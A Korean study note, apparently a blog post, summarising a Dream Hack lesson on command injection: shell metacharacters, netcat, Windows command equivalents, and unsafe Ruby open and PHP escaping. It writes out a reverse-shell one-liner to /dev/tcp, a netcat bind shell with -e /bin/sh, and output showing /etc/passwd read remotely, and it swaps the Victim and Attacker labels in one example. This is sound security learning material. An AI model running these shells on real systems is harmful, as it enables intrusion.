[2020.11.28] Dream Hack - Server-Side Advanced - Command Injection

01 Shell

Sehll : 운영 체제(OS)에서 커널과 사용자의 입/출력을 담당하는 시스템 프로그램.

-> 사용자가 입력하는 데이터를 해석한 후 커널에 요청하고, 요청에 대한 결과를 사용자에게 반환

 

*  커널: 소프트웨어와 하드웨어 간의 커뮤니케이션을 관리하는 프로그램

 

PATH(환경변수): OS입장에서 해당 프로세스를 실행시키기 위해 참조하는 변수

-> PATH변수 외에도 현재 쉘에 대한 정보, 현재 경로, 이전 경로 등 다양한    

    정보 포함.

 

메타 문자

1) .

 pwd: 현재 위치한 경로를 볼 수 있음

. : 현재 디렉토리 / ..: 부모(상위) 디렉토리

=> pwd 명령어로 현재 디렉토리와 부모 디렉토리 경로 확인

 

..: {1..10} 1에서 10까지 연속적인 표현

2) >

cat : 파일 내용을 보여줌

> : 파일에 내용을 써줌

=> id 명령어 실행 결과를 /tmp/res.txt.파일에 씀 -> cat으로 결과 확인

 

3) >>

echo: 화면 문자열을 출력해줌

>> : 이전에 있던 내용에 덧붙여서 써줌

=> echo 실행 결과를 파일에 쓰고 그 뒷부분에 id 실행 결과를 이어서 씀

 

4) &>, >&

&>,>&: 표준 출력과 표준 에러를 모두 출력 (&>는 비표준)

2>&1: 표준 에러를 표준 출력이 보내진 곳과 동일한 곳으로 보냄

• (0: 표준 입력, 1: 표준 출력, 2: 표준 에러)

5) <

   파일 내용을 가져와 읽어줌

 

6) ?, *

특정 파일을 찾을 때 사용

=> /bin/ 폴더 내부에 c로 시작하는 세글자(c??) 파일 보여줌(ls명령어로)

=> /bin/ 폴더 내부에 c로 시작하는 모든 파일 보여줌

7) ~

  home 디렉토리

(출처- dreamheck)

 

02 Exploit Technique

 

1.Reverse Shell

Attacker가 Victim 쪽으로 접속하기 위해서, 

Victim쪽에서 Attacker쪽으로 Shell을 열어주는 것

 

-Attacker : 보통 nc 명령어를 이용해 listening 상태로 만들어 줌

-Victim : Reverse Shell 열어 줌

-> Attacker는 Shell을 건네 받아 시스템을 완전히 장악하는 용도로 사용

 

Ex)

Victim : nc -nlvp 8080

Attacker : /bin/sh -i >& /dev/tcp/127.0.0.1/8080 0>&1

 

-i

-shell의 i 옵션을 사용한 것이다.

-i 옵션은 대화형 모드로 사용하겠다는 의미이다.

 

>& /dev/tcp/127.0.0.1/8080

-Shell을 tcp 127.0.0.1:8080으로 리다이렉트 하겠다는 의미

 

0>&1

-표준 출력을 전달한다는 의미

-파일디스크립터라고 하며 3가지가 존재함

-0: 표준입력 / 1: 표준출력 / 2: 표준에러

2. nc (netcat)

 

- TCP나 UDP 프로토콜을 사용하는 네트워크 연결에서 데이터를 읽고 쓰는 간단한 유틸리티 프로그램

- 스크립트와 병용하여 network에 대한 debugging, testing tool로써 매우 편리

- 원하는 포트로 원하는 데이터를 주고 받을 수 있는 특징 때문에 해킹에도 널리 이용되며,

컴퓨터 포렌식에 있어서 라이브시스템의 데이터를 손상없이 가져오기 위해서도 사용될 수 있음

 

usage : nc [options] [target host] [ports]

 

ex.

 

(reverse shell) *취약점이 발생하는 서버에서 공격자의 서버로 쉘을 연결(Network Outbound) $ nc -l -p 8080 -k –v Listening on [0.0.0.0] (family 0, port 8080)Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 42202) root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ...

(bind shell) *특정 포트로 쉘을 서비스하는 것 (Network Inbound) nc -nlvp 8080 -e /bin/sh

 

[사용된 옵션 정리]

-l: listening 모드로 실행. 

-p: source port 지정. 

-k: listening 모드로 실행되었을 때 연결이 완료되더라도 프로세스가 종료되지 않도록 하는 옵션.

-v: 과정 출력

-n: hostname을 ip 로만 지정.

 

https://gptjs409.github.io/infra/2016/09/08/nc.html

https://leekeezz.tistory.com/57

https://htst.tistory.com/61 [DrakeOh]

03 Windows 환경

 

<리눅스 환경과 대응하는 윈도우 명령어>

 

ls	dir	디렉터리 파일 목록 출력
cat	type	파일 내용 출력
cd	cd	디렉터리 이동
rm	del	파일 삭제
mv	move	파일 이동
cp	copy	파일 복사
ifconfig	ipconfig	네트워크 설정
env, export	set	환경변수 설정

 

 

04 Command Injection Bug Cases

 - open

: RUBY, PERL 의 output/input Util 함수

: open 함수의 원형

 

static VALUE rb_f_open(int argc, VALUE *argv, VALUE _) {     ID to_open = 0;     int redirect = FALSE;     if (argc >= 1) { CONST_ID(to_open, "to_open"); if (rb_respond_to(argv[0], to_open)) {     redirect = TRUE; } else {     VALUE tmp = argv[0];     FilePathValue(tmp);     if (NIL_P(tmp)) { redirect = TRUE;     }     else {                 VALUE cmd = check_pipe_command(tmp);                 if (!NIL_P(cmd)) {     argv[0] = cmd;     return rb_io_s_popen(argc, argv, rb_cIO); }

 

>> 첫 글자가 | (pipe / vertial bar) 일 경우에 pipe_open을 이용해 커맨드.

 - escapeshellcmd

>> 시스템 셸로 실행할 수 있는 특수문자에 백슬래시를 붙여 명령어를 실행할 수 없도록 방어한다.

사용하는 우회 문자 : #, &, |, ‘, * 등등..

 

* escapeshellarg와 escapeshellcmd의 차이점?

 

디렉토리에 있는 파일 목록을 가져와야한다고 가정하자.

 

escapeshellcmd 사용:

>> 여러 명령을 실행할 수 있는 문자만 이스케이프하므로 주요위험을 차단하는 동시에 여러 매개변수 전달 가능

 

escapeshellarg 사용:

>> 전체 인수가 인용되어 있으므로 개별 공백 등을 이스케이프 할 필요가 없다.

 

요약: cmd는 문자열이 하나의 명령인지를 확인하고, arg는 문자열을 명령에 대한 단일 인수로 안전하게 사용하도록 한다. 또한 훨씬 적은 수의 문자를 이스케이프하고 작업을 수행한다.

 

(출처: https://java2020.com/q/asxnvyqf)

 

zip

curl / wget

: URL을 입력으로 받은 후 접속하는 CLI 프로그램